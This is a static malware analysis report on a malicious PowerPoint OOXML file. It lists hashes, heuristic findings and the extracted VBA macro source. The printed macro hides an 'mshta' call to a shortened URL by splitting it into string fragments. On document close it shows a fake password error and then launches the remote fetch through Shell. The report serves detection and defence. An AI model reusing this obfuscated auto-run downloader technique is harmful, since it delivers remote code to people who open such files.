Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a2e98dd3fa146e70…

MALICIOUS

Office (OOXML)

11.0 KB First seen: 2021-04-29
MD5: 7c629522213c57c3b3d66ee8e6c13fed SHA-1: 352b55636c67a5cd27a998888df0a137ef5433d8 SHA-256: a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
150 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell _
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
    Shell _
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Auto_close()
  • VBA project signed with a self-signed certificate info OLE_VBA_SIGNATURE_SELF_SIGNED
    The VBA project is signed, but the signing certificate is self-signed (issuer equals subject) — no certificate authority vouches for the signer. Self-signed VBA signing is the common trick to make a macro project appear signed/trusted without a real publisher identity.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 881 bytes
SHA-256: 026fbefabaffbda0dd803cbde17368df9917f9444c82205fae4d416985f3bd6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dotcom1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Property Get computer() As String
computer = "m" + "s" + "h" + "t" + "a h"
End Property
Public Property Get computer2() As String
computer2 = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w"
End Property
Public Property Get computer3() As String
computer3 = ".j.mp/llsoaskokcdokoktewelvw"
End Property



Attribute VB_Name = "Moon"
Dim mode As New dotcom1

Function p()
p = mode.computer + mode.computer2 + mode.computer3

End Function
Sub _
Auto_close()
: InputBox "Password!": MsgBox "ERROR! Password Incorrect!"
Call _
Shell _
(p)
End Sub
vbaProject_00.bin🔏 Self-signedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.		 vba-project OOXML VBA project: ppt/vbaProject.bin 18944 bytes
SHA-256: 8ffe9e76f46b6c1795fcee076be87d6f45569d5cd8882d199521cd190d27bf52

Open this report in the interactive analyzer, or submit your own file for analysis.